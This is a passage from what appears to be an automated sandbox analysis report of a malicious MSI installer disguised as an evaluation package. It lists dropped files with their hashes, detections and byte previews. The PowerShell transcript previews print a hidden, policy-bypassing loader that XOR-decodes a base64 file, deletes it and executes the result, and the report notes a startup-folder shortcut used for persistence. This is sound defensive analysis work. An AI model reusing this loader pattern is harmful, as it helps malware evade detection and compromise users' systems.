                                                                                                    MD5:292A10B36467BD8ECC977235910445A1
                                                                                                    SHA1:AC501553C6E084E981A4CB020496A795FFB64F18
                                                                                                    SHA-256:332EAD334D70B567BB0D0954B0CC105E5DE85D999196778373EF403B4E770072
                                                                                                    SHA-512:76591A31E546723814A41CF1BA756380AD685F57A20794847300632586158D56D5A7FCFABDB912CBF6EC7286853EA7355576FCC85F03DE45F513F6B81004C7A3
                                                                                                    Malicious:false
                                                                                                    Preview: ...................................FL..................F. .. ...j.F.V....u=.V...j.F.V...U.........................:..DG..Yr?.D..U..k0.&...&...........-....V.....u=.V.......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..DS{......Y....................yN|.A.p.p.D.a.t.a...B.V.1.....DS....Roaming.@.......N..DS.......Y....................0.x.R.o.a.m.i.n.g.....\.1.....DS....MICROS~1..D.......N..DS.......Y.....................5}.M.i.c.r.o.s.o.f.t.....V.1.....>Q.<..Windows.@.......N..DS{......Y........................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N..DS|......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N..DS|......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1.....DS....Startup.h.......N..DS......................>.........S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.......2.U...DS.. .ACEEF8~1.LNK..t......DS..DS..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6205
                                                                                                    Entropy (8bit):3.76398341670208
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:k43kdH9MiLN0C9UHyE8qjkukvhkvklCyw+yYSoc8/9SogZoaSYSoc8/9SogZoOH:k7dH9HLN0CSS/qBkvhkvCCtpnzHinzHD
                                                                                                    MD5:2045D527F20EDF49B7E17A6368F147C6
                                                                                                    SHA1:ED998E5344A216F33EBEAC57DC5C0F91A9945E50
                                                                                                    SHA-256:40E6ECDA8CBD07EED3B4F29C8A383B3345446AC83021BBB6FC563E47481FF0CD
                                                                                                    SHA-512:55E66F758E6E6C6E2956B8D0E0937BFB8892916044B2D5CA3CC8A1DEF852290BB7B39818BE8716BA2C195CCA35A5148D5FB0C971452478F60105A1B6790213DB
                                                                                                    Malicious:false
                                                                                                    Preview: ...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-....V....SY..U.......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..DS{......Y....................yN|.A.p.p.D.a.t.a...B.V.1.....DS....Roaming.@.......N..DS.......Y........................R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N..DS{......Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....>Q.<..Windows.@.......N..DS{......Y........................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N..DS|......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N..DS|......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..>QZ7.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K7341091CJBPB5T3JTW.temp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6205
                                                                                                    Entropy (8bit):3.76398341670208
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:k43kdH9MiLN0C9UHyE8qjkukvhkvklCyw+yYSoc8/9SogZoaSYSoc8/9SogZoOH:k7dH9HLN0CSS/qBkvhkvCCtpnzHinzHD
                                                                                                    MD5:2045D527F20EDF49B7E17A6368F147C6
                                                                                                    SHA1:ED998E5344A216F33EBEAC57DC5C0F91A9945E50
                                                                                                    SHA-256:40E6ECDA8CBD07EED3B4F29C8A383B3345446AC83021BBB6FC563E47481FF0CD
                                                                                                    SHA-512:55E66F758E6E6C6E2956B8D0E0937BFB8892916044B2D5CA3CC8A1DEF852290BB7B39818BE8716BA2C195CCA35A5148D5FB0C971452478F60105A1B6790213DB
                                                                                                    Malicious:false
                                                                                                    Preview: ...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-....V....SY..U.......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..DS{......Y....................yN|.A.p.p.D.a.t.a...B.V.1.....DS....Roaming.@.......N..DS.......Y........................R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N..DS{......Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....>Q.<..Windows.@.......N..DS{......Y........................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N..DS|......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N..DS|......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..>QZ7.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VT2R6UL37SSAGW1GLLCR.temp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5343
                                                                                                    Entropy (8bit):4.009664379318437
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:l+36Q9lB+N0C9PpMCAlTjkuGWVyYSoc8/9SogZoaSYSoc8/9SogZoOH:5Q96N0ClpMCAlTBGWYnzHinzHD
                                                                                                    MD5:292A10B36467BD8ECC977235910445A1
                                                                                                    SHA1:AC501553C6E084E981A4CB020496A795FFB64F18
                                                                                                    SHA-256:332EAD334D70B567BB0D0954B0CC105E5DE85D999196778373EF403B4E770072
                                                                                                    SHA-512:76591A31E546723814A41CF1BA756380AD685F57A20794847300632586158D56D5A7FCFABDB912CBF6EC7286853EA7355576FCC85F03DE45F513F6B81004C7A3
                                                                                                    Malicious:false
                                                                                                    Preview: ...................................FL..................F. .. ...j.F.V....u=.V...j.F.V...U.........................:..DG..Yr?.D..U..k0.&...&...........-....V.....u=.V.......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..DS{......Y....................yN|.A.p.p.D.a.t.a...B.V.1.....DS....Roaming.@.......N..DS.......Y....................0.x.R.o.a.m.i.n.g.....\.1.....DS....MICROS~1..D.......N..DS.......Y.....................5}.M.i.c.r.o.s.o.f.t.....V.1.....>Q.<..Windows.@.......N..DS{......Y........................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N..DS|......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N..DS|......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1.....DS....Startup.h.......N..DS......................>.........S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.......2.U...DS.. .ACEEF8~1.LNK..t......DS..DS..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aceef8ac0de486b7cbb4c345e0d7f.LNk
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Oct 4 18:28:30 2021, mtime=Mon Oct 4 18:28:30 2021, atime=Mon Oct 4 18:28:30 2021, length=54603, window=hidenormalshowminimized
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1109
                                                                                                    Entropy (8bit):5.030344345942585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:8m3kodS9l41o5Xc2dThvuGwvA6muJxWGwkAlBm:8m3kcS9WiecThmGw4nuJsGwv
                                                                                                    MD5:FDA5A0ADB99405F58CC8CC4B9A681DF8
                                                                                                    SHA1:6BF090DA0FCF139E7852C7AC07979F2C4F1ABACD
                                                                                                    SHA-256:3A28884964F6A015F3AF07B960C09E78B534A6041209CDDFE30BC192B7E08725
                                                                                                    SHA-512:CE2F8C2A64789C7A1E9C41C472B60E4449D9C1902379CAF411093A8732C78A1E640E4F5F1DC5BC06AE801A8F4F5B809607399A588EEDEA169B1320B322E676E7
                                                                                                    Malicious:false
                                                                                                    Preview: L..................F.... .....0.V...ya3.V...ya3.V...K.......................b.:..DG..Yr?.D..U..k0.&...&...........-....V....SY..U.......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..DS{......Y....................yN|.A.p.p.D.a.t.a...B.V.1.....DS....Roaming.@.......N..DS.......Y........................R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N..DS{......Y.....................sJ.M.i.c.r.o.s.o.f.t.....`.1.....DS....UKPPOY~1..H......DS..DS.............................5}.U.k.p.P.O.Y.B.g.m.R.z.......2.K...DS.. .OHZWVT~1.SOM..v......DS..DS.............................N..O.h.z.W.V.t.Y.i.j.v.s.g.N.y.R.I.P.o...S.O.m.G.a.U.Y.i.W.F.c.L.y.T.k.......................-...................W........C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OhzWVtYijvsgNyRIPo.SOmGaUYiWFcLyTk..:.....\.....\.....\.....\.U.k.p.P.O.Y.B.g.m.R.z.\.O.h.z.W.V.t.Y.i.j.v.s.g.N.y.R.I.P.o...S.O.m.G.a.U.Y.i.W.F.c.L.y.T.k.`.......X.......377142...........!a..%.H.VZAj...............
                                                                                                    C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16852824
                                                                                                    Entropy (8bit):6.81149936180454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:393216:6tGKFBfXhHQiYxSoJQCCdzlQEblI2rqNCFnWZYLjDkQ:kDFBfRgxS+CvQmIynWZRQ
                                                                                                    MD5:801B1B11E979AF812CA4387E5F438AD8
                                                                                                    SHA1:180EF9CF27EB259954D2225B0621408A1E1F3F5E
                                                                                                    SHA-256:81F0C9FFF344742455596A5062FD6875B28BD9981469575164DF942F1C9AD2B2
                                                                                                    SHA-512:2E14902BE3B577A06E0A93700F2EB7E27EDF6F348958B8BD59F1FF9B3709AAF56AFE4BCB7224D0EDD6033308CD71ECF6744DD5782FD62F41859EB404F3212D96
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                                                                    Preview: MZ......................@...................................`...........!..L.!This program cannot be run in DOS mode....$.........!...r...r...r...s..r..1r...rg1.r..r...s..r...s..r...sP..r...s..r...s...r...s...r...s...rN..s..rc..s!..rc..s,..r...r..re..s..r...r...r3..s...r2..s..rN..s...rN..sk..rN..s...rN.3r...r..[r...rN..s...rRich...r........PE..L...=.._.....................vh..................@.......................................@......................... ...4...T...........S;.............X!...0...^...i..T...................Dj......0...@....................T.. ....................text............................... ..`.rdata..6........ ..................@..@.data...x...........................@....rsrc....S;.....T;..R..............@..@.reloc...^...0...`..................@..B........................................................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Roaming\pdata.txt
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114220
                                                                                                    Entropy (8bit):5.707140945604917
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:1GWqoE8CWahf5yRan/di7eo87qI0C/xEwsXqsMdf:AakhvyRo8BI0C/xw6sy
                                                                                                    MD5:91ED8D6CFB3E06CC685B01055BF6C950
                                                                                                    SHA1:9A3D7228156D5E11C19F7CCDB9DB1C40189DA78E
                                                                                                    SHA-256:C8CB3473E8E124968D34F9D7FBF9F35DC295782B6DDFFE20F61AA3A35297A35A
                                                                                                    SHA-512:E86454BE52C40E1173BBED9D13FFCCFAAD60CEA82B2CED4EF2CA60057404D0534190C8C9A9716536C024DC1F2C0A877942780DC8B9FA967397B455E26546E900
                                                                                                    Malicious:true
                                                                                                    Preview: aypIcQYuZABcCQJIfhMnOmlbLGw+DREaZh5hAkQgU2YtODYyIQZuGhslAT8EGCYmEgMcLgIEHTM0JT49CBAwNwkNACsDOR8nDwc9KAY8Mh8gAjguKBcCMhQ/HRYAG3JhNx4QLzFCVSUBDBkNAiUlVFsAKDoFIgQ5dit8NWlZQUg0Dhc2Pw0/Eyw5HQ8NAREHBzckBTAOMVknJiVeBB0VBiYKEwM5PzcpBg4cLxUHEwASORBBBTwAIzoWX2o2FjgDFzkVASwIKxQsIz1YBjQcAwMxNzQHYyEOMA1fJQciHBwKOwcHOxoLLTIqHxYXAB4VMR4VDSAUHRMcIy8DNw46BgQkLj0AHD8oMiI+CCw+DgQcIRA5A185YAkFOSMyEx8dLBMFOTYXBi0SOQ0vHyMvIDQzYys2QDkhGXkJKwF7HFAzBx4HByI+ABwJAz44PgNPBSAhUxUTPAc0IiAkDGMdOhkIFSMEHwAdADYIPAJ4FjE0JWczPV08WygjDxoUARsjDwM9FQYwLTYXACwgKEkCRRAUNHsdGAEWNxoAJTRDNi8WMQEhNx4EMjgAJCIrITYoDig6ZQgAAAEyPwMxFAIkFTA8HUEIBQUULAoNOzMfHDs3CCoiKw0oOzEjJjQ7EDQfHiA2KxcpJi4JPx82Ci0MECMpGioAPCg8EAQvCAAGFRw0H2IQLDBdJCsPNxk0DBQ2PwEFRQFHNh0TFggFOwcDMAozH1MVdQJ1B0kOLCw4O3YYCxEGOyMfHzMfBDcdDzczOQwUBTNaKwcpDyJqEV8QNxQRNT4BSRAQIykeDAZIeA8cBGc6GH50CCwsPgE0GSYCGh0Sdjl5HDI9AA0aGDIMbQpfBzcbPxxLBxYxICEBHjgyKTQxJmERMAAbNzgURTlaOxk2Ai4nMzYyI2sICFs8AwMgdyIWAhMnOS81KQZJE1Qvdl8gABYKByAbEXIcCAVkNDAYKwEjPjgueAEbASU5VzgmU0QBQnICDwRwPj8G
                                                                                                    C:\Users\user\Documents\20211004\PowerShell_transcript.377142.jz31g9vN.20211004212906.txt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1853
                                                                                                    Entropy (8bit):5.755396216243982
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:BZQvjKoO6eOPAz5JEmatlVSN0ld7u9XhevW6qDYB1ZA:BZojKNjOy5CmwyN0lE9ERqDo1ZA
                                                                                                    MD5:7F6D32B5ECBAC9C7AFFE8AE8DFD58507
                                                                                                    SHA1:249EB51A60DC91211DEF193467B912C08A1AB98A
                                                                                                    SHA-256:AF538DC0C79539915663402ECFF050AE49BC467888FB239C49D2E871548ABF02
                                                                                                    SHA-512:403282ACC551E25DBBAE9B1C26C47DDA7346726ED89728CF3C2B8DE73800F2B610AED4A501F4D7D82F180A4CDAE6E3141D5DBDC6429D38A4F962597A5A1FEBC8
                                                                                                    Malicious:false
                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211004212906..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: PowerShell.exe -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND $ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d
                                                                                                    C:\Users\user\Documents\20211004\PowerShell_transcript.377142.wm8KM1k2.20211004212820.txt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2871
                                                                                                    Entropy (8bit):5.582984689481776
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:BZuvvjKoO3kB3Nigkqw11tqDYB1Zo3kB3Nigkqw1xNEtXtdXta+ZXkxLAkaAXbxL:BZIjKN3kBfz23qDo1ZekBfz2xNEtXtdM
                                                                                                    MD5:CA9D82591B0074CA158333C003A56390
                                                                                                    SHA1:639BD6D58C7E27DB46DCACC49AAEF935B13C351E
                                                                                                    SHA-256:FE35362E4A512BD8165EB96516A36D76221197B0A22B8718B0621A9AFBC4DC0C
                                                                                                    SHA-512:72F927BF56975728D10086CEEE00AEFC374FA5F570E7D3BEE8FBBE03AAC976F395F2FB14E282B482C89AB94155BFE71AB1CD11CDD12DA3A2085373394DAFD173
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211004\PowerShell_transcript.377142.wm8KM1k2.20211004212820.txt, Author: Joe Security
                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211004212821..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -windowstyle hidden -command $xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;..Process ID: 2212..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.
                                                                                                    C:\Windows\Installer\5206a8.msi
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: (EMCO EVALUATION PACKAGE) - V2, Author: LTD, Keywords: Installer, Comments: This installer database contains the logic and data required to install (EMCO EVALUATION PACKAGE) - V2., Template: x64;1033, Revision Number: {549A417F-BD1F-4387-A76F-A86CCEF6964C}, Create Time/Date: Fri Oct 1 19:21:26 2021, Last Saved Time/Date: Fri Oct 1 19:21:26 2021, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.10.1.2213), Security: 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9105408
                                                                                                    Entropy (8bit):7.951722927372294
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:196608:Ea/OZSY8CGlknjT573H9O5FG0xapeshnYSwFXdTFwI1M:v/LTCWSRbdeZjshYSwFXdTCA
                                                                                                    MD5:F6118522893F3CD95198527D6F0282BA
                                                                                                    SHA1:DD9B59D2553043A4740B9CD557C7DDE0740050CF
                                                                                                    SHA-256:5CF24553E521DE102628E1EBDADB69A6623904F08B51CF5B1EA14779E03E8682
                                                                                                    SHA-512:CDDDBBA487B41D54CF117663A09DD13D374CF24EAECB16677EBE499051DD14CE5E51E65393D705C265F0A8B4234163ACB4A70E0A069848AD0D519B125393DBA4
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Windows\Installer\5206a8.msi, Author: Joe Security
                                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Windows\Installer\5206aa.msi
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: (EMCO EVALUATION PACKAGE) - V2, Author: LTD, Keywords: Installer, Comments: This installer database contains the logic and data required to install (EMCO EVALUATION PACKAGE) - V2., Template: x64;1033, Revision Number: {549A417F-BD1F-4387-A76F-A86CCEF6964C}, Create Time/Date: Fri Oct 1 19:21:26 2021, Last Saved Time/Date: Fri Oct 1 19:21:26 2021, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.10.1.2213), Security: 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9105408
                                                                                                    Entropy (8bit):7.951722927372294
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:196608:Ea/OZSY8CGlknjT573H9O5FG0xapeshnYSwFXdTFwI1M:v/LTCWSRbdeZjshYSwFXdTCA
                                                                                                    MD5:F6118522893F3CD95198527D6F0282BA
                                                                                                    SHA1:DD9B59D2553043A4740B9CD557C7DDE0740050CF
                                                                                                    SHA-256:5CF24553E521DE102628E1EBDADB69A6623904F08B51CF5B1EA14779E03E8682
                                                                                                    SHA-512:CDDDBBA487B41D54CF117663A09DD13D374CF24EAECB16677EBE499051DD14CE5E51E65393D705C265F0A8B4234163ACB4A70E0A069848AD0D519B125393DBA4
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Windows\Installer\5206aa.msi, Author: Joe Security
                                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSI113A.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2611862
                                                                                                    Entropy (8bit):6.341468656352278
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:ewxcLDe+cpl7+GgYwxcLDe+cpl7+GgbwxcLDe+cpl7+Gg1:5a/MpZOa/MpZ7a/MpZG
                                                                                                    MD5:05B09F8961B3ABC2BD3B470ADD0239E2
                                                                                                    SHA1:AF0D98A648088DED33B9FF8946BBBCA479CEB932
                                                                                                    SHA-256:E57C330FA9ADB4B955CA7EAFBE7DD8165DE7C50B2BBC83944C1D0AFA46A10C0B
                                                                                                    SHA-512:5F676B8DC73F4F5687833800AB08502E7540FDB7E1B1EF5D218393174E12F0047305257316DFEB8A74B7A487B544A165EEE74CB4B4A31E10C8F26A94888067DE
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Windows\Installer\MSI113A.tmp, Author: Joe Security
                                                                                                    Preview: ...@IXOS.@.....@..DS.@.....@.....@.....@.....@.....@......&.{92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}..(EMCO EVALUATION PACKAGE) - V2%.Nyship-Empire-Plan-Gym-Membership.msi.@.....@.....@.....@........&.{549A417F-BD1F-4387-A76F-A86CCEF6964C}.....@.....@.....@.....@.......@.....@.....@.......@......(EMCO EVALUATION PACKAGE) - V2......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ECA_InstallRollback....J...ECA_InstallRollback.@.......C..MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w.......................
                                                                                                    C:\Windows\Installer\MSI11D7.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSI1265.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSI1A75.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
